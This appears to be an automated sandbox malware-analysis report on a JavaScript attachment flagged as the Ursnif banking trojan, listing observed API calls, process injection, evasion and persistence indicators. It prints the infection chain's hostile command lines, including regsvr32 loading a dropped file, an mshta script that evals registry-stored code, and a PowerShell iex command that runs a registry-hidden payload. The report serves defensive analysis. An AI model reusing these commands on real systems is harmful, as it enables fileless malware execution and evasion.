Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C113E GetProcAddress,NtCreateSection,memset,4_2_733C113E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C1652 NtMapViewOfSection,4_2_733C1652
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_733C2765 NtQueryVirtualMemory,4_2_733C2765
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D104C NtCreateSection,4_2_004D104C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D1EAA NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,4_2_004D1EAA
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_004D25BE NtMapViewOfSection,4_2_004D25BE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 4_2_04AA5CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,4_2_04AA5CD8
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA75B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ABCEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA668C NtMapViewOfSection
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AC0170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB02DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ABCA3E GetProcAddress,NtCreateSection,memset
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB8A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ABA27A NtQueryInformationProcess
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ABA395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB93CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA4D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ABC7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ABB07A NtQuerySystemInformation,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AAA99C NtGetContextThread,RtlNtStatusToDosError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB7933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB4968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB8A15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB73D6 memset,NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 15_2_00324AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose
Source: C:\Windows\System32\control.exe | Code function: 15_2_00308AD8 NtSetInformationProcess,CreateRemoteThread
Source: C:\Windows\System32\control.exe | Code function: 15_2_00322DC0 NtQueryInformationProcess
Source: C:\Windows\System32\control.exe | Code function: 15_2_00341004 NtProtectVirtualMemory,NtProtectVirtualMemory
Contains functionality to launch a process as a different user
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ABB254 CreateProcessAsUserW
Detected potential crypto function
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C2544
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004DAA84
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004D835E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004D172E
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AC6D18
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AC1570
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AC1D5A
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB2EDE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AC2613
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB3F8C
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA6F34
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB2778
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AACF55
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB10DE
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AADB4A
Source: C:\Windows\System32\control.exe | Code function: 15_2_003279AC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00325550
Source: C:\Windows\System32\control.exe | Code function: 15_2_0030682C
Source: C:\Windows\System32\control.exe | Code function: 15_2_0030C850
Source: C:\Windows\System32\control.exe | Code function: 15_2_003158F4
Source: C:\Windows\System32\control.exe | Code function: 15_2_00308128
Source: C:\Windows\System32\control.exe | Code function: 15_2_0030D178
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032F944
Source: C:\Windows\System32\control.exe | Code function: 15_2_0030D9B0
Source: C:\Windows\System32\control.exe | Code function: 15_2_003011A0
Source: C:\Windows\System32\control.exe | Code function: 15_2_003071CC
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032F214
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032AA0C
Source: C:\Windows\System32\control.exe | Code function: 15_2_0030A2B4
Source: C:\Windows\System32\control.exe | Code function: 15_2_00302AB5
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032DA94
Source: C:\Windows\System32\control.exe | Code function: 15_2_00309B34
Source: C:\Windows\System32\control.exe | Code function: 15_2_00312318
Source: C:\Windows\System32\control.exe | Code function: 15_2_00329358
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032DB90
Source: C:\Windows\System32\control.exe | Code function: 15_2_00313B94
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032B3F0
Source: C:\Windows\System32\control.exe | Code function: 15_2_0031F3CC
Source: C:\Windows\System32\control.exe | Code function: 15_2_00326C2C
Source: C:\Windows\System32\control.exe | Code function: 15_2_00317C70
Source: C:\Windows\System32\control.exe | Code function: 15_2_0030B474
Source: C:\Windows\System32\control.exe | Code function: 15_2_00312C58
Source: C:\Windows\System32\control.exe | Code function: 15_2_0031BC5C
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032A520
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032E520
Source: C:\Windows\System32\control.exe | Code function: 15_2_00310D08
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032CD48
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032FE60
Source: C:\Windows\System32\control.exe | Code function: 15_2_0031CE40
Source: C:\Windows\System32\control.exe | Code function: 15_2_00328E40
Source: C:\Windows\System32\control.exe | Code function: 15_2_00302644
Source: C:\Windows\System32\control.exe | Code function: 15_2_00322EBC
Source: C:\Windows\System32\control.exe | Code function: 15_2_0030FE88
Source: C:\Windows\System32\control.exe | Code function: 15_2_00325EFC
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032BECC
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032873C
Source: C:\Windows\System32\control.exe | Code function: 15_2_003307B8
Source: C:\Windows\System32\control.exe | Code function: 15_2_00306F84
Source: C:\Windows\System32\control.exe | Code function: 15_2_0031FFF0
Source: C:\Windows\System32\control.exe | Code function: 15_2_0032DFC4
Java / VBScript file with very long strings (likely obfuscated code)
Source: job_attach_t9o.js | Initial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
Tries to load missing DLLs
Source: C:\Windows\System32\regsvr32.exe | Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: sfc.dll
Classification label
Source: classification engine | Classification label: mal100.bank.troj.evad.winJS@19/18@4/1
Contains functionality to enum processes or threads
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB6887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle
Creates files inside the user directory
Source: C:\Program Files\internet explorer\iexplore.exe | File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High
Creates mutexes
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1184:120:WilError_01
Source: C:\Windows\SysWOW64\regsvr32.exe | Mutant created: \Sessions\1\BaseNamedObjects\{BF63D8CB-121E-49A6-1463-668D8847FA11}
Source: C:\Windows\System32\control.exe | Mutant created: \Sessions\1\BaseNamedObjects\{DB802072-7EC0-C5ED-603F-92C994E3E60D}
Creates temporary files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\iRbAiisnfBO.xCyMOB
Parts of this application are using the .NET runtime (probably coded in C#)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini files
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Reads software policies
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Sample might require command line arguments
Source: regsvr32.exe | String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processes
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\job_attach_t9o.js'
Source: unknown | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt
Source: unknown | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt
Source: unknown | Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:17410 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82950 /prefetch:2
Source: unknown | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82956 /prefetch:2
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknown | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt
Source: C:\Windows\System32\regsvr32.exe | Process created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:17410 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82950 /prefetch:2
Source: C:\Program Files\internet explorer\iexplore.exe | Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:4836 CREDAT:82956 /prefetch:2
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Uses an in-process (OLE) Automation server
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32
Reads Internet Explorer settings
Source: C:\Windows\System32\mshta.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
Found graphical window changes (likely an installer)
Source: Window Recorder | Window detected: More than 3 window changes detected
Uses Microsoft Silverlight
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samples
Source: job_attach_t9o.js | Static file information: File size 1587553 > 1048576
Uses new MSVCR DLLs
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe | File opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dll
Binary contains paths to debug symbols
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000002.1271938700.0000000007010000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000004.00000003.1198870147.00000000059E0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000004.00000003.1198870147.00000000059E0000.00000004.00000001.sdmp
Source: Binary string: c:\All\Cloud\Stay\case\Dance\Took\Figureparagraph.pdb source: regsvr32.exe, ZyQNToG.txt.0.dr
Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000002.1271938700.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

JScript performs obfuscated calls to suspicious functions
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt");
Suspicious powershell command line found
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB6450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C2533 push ecx; ret 4_2_733C2543
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C24E0 push ecx; ret 4_2_733C24E9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004DAA73 push ecx; ret 4_2_004DAA83
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004DA740 push ecx; ret 4_2_004DA749
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AC6D07 push ecx; ret 4_2_04AC6D17
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AC69A0 push ecx; ret 4_2_04AC69A9
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ACBA98 push edx; ret 4_2_04ACBAAD
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ACBA74 push edx; retn 0002h 4_2_04ACBA75
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04ACBA4E push ds; retn 0002h 4_2_04ACBA69
Source: C:\Windows\System32\control.exe | Code function: 15_2_0031B849 push 3B000001h; retf 15_2_0031B84E

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ZyQNToG.txt
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\System32\wscript.exe | File created: C:\Users\user\AppData\Local\Temp\ZyQNToG.txt

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match | File source: 00000004.00000003.1064584505.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1107254349.0000000004D5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.1235424292.0000000004AA0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064674452.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064703086.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064524352.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000003.1207232988.000001C7C63B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064632588.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064218194.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 0000000F.00000002.1276679333.000000000033E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1190242494.0000000000700000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064435714.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000003.1064335431.0000000004ED8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 3064, type: MEMORY
Source: Yara match | File source: Process Memory Space: control.exe PID: 4740, type: MEMORY
Disables application error messages (SetErrorMode)
Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\SysWOW64\regsvr32.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
Source: C:\Windows\System32\mshta.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (112 identical entries)

Malware Analysis System Evasion:

Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
Found WSH timer for Javascript or VBS script (likely evasive script)
Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2547
Found evasive API chain (date check)
Source: C:\Windows\SysWOW64\regsvr32.exe | Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Found evasive API chain checking for process token information
Source: C:\Windows\SysWOW64\regsvr32.exe | Check user administrative privileges: GetTokenInformation,DecisionNodes
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | TID: 3380 | Thread sleep time: -922337203685477s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\regsvr32.exe | Last function: Thread delayed
Contains functionality to enumerate / list files inside a directory
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_004D7EE6 memset,CreateFileA,GetFileTime,FindCloseChangeNotification,StrRChrA,lstrcat,FindFirstFileA,FindNextFileA,StrChrA,memcpy,FindNextFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB940E RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AACDF2 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AA8181 lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose
Contains functionality to query local drives
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB7CDC wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmp | Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmp | Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: explorer.exe, 00000010.00000002.1272379842.0000000007340000.00000002.00000001.sdmp | Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
(These four strings are Windows' own Host Compute Service error messages; as the only VM-artifact hits in the report, and found in explorer.exe, they are weak evidence of deliberate VM detection.)
Queries a list of all running processes
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

Anti Debugging:

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C1006 LdrInitializeThunk,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AB6450 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress
Contains functionality to read the PEB
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733DC590 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733DC0D0 push dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733DC4C6 mov eax, dword ptr fs:[00000030h]
Contains functionality to register its own exception handler
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_733C223F InitializeCriticalSection,TlsAlloc,RtlAddVectoredExceptionHandler,GetLastError
Source: C:\Windows\SysWOW64\regsvr32.exe | Code function: 4_2_04AAC0D6 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,LdrInitializeThunk,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler

HIPS / PFW / Operating System Protection Evasion:

Benign windows process drops PE files
Source: C:\Windows\System32\wscript.exe | File created: ZyQNToG.txt.0.dr
Allocates memory in foreign processes
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory allocated: C:\Windows\System32\control.exe base: 3C0000 protect: page execute and read and write
Creates a thread in another existing process (thread injection)
Source: C:\Windows\System32\control.exe | Thread created: C:\Windows\explorer.exe EIP: 352A1000
Maps a DLL or memory area into another process
Source: C:\Windows\SysWOW64\regsvr32.exe | Section loaded: unknown target: C:\Windows\System32\control.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\SysWOW64\regsvr32.exe | Thread register set: target process: 4740
Writes to foreign memory regions
Source: C:\Windows\SysWOW64\regsvr32.exe | Memory written: C:\Windows\System32\control.exe base: 3C0000
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\ZyQNToG.txt
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: C:\Windows\System32\mshta.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: C:\Windows\SysWOW64\regsvr32.exe | Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
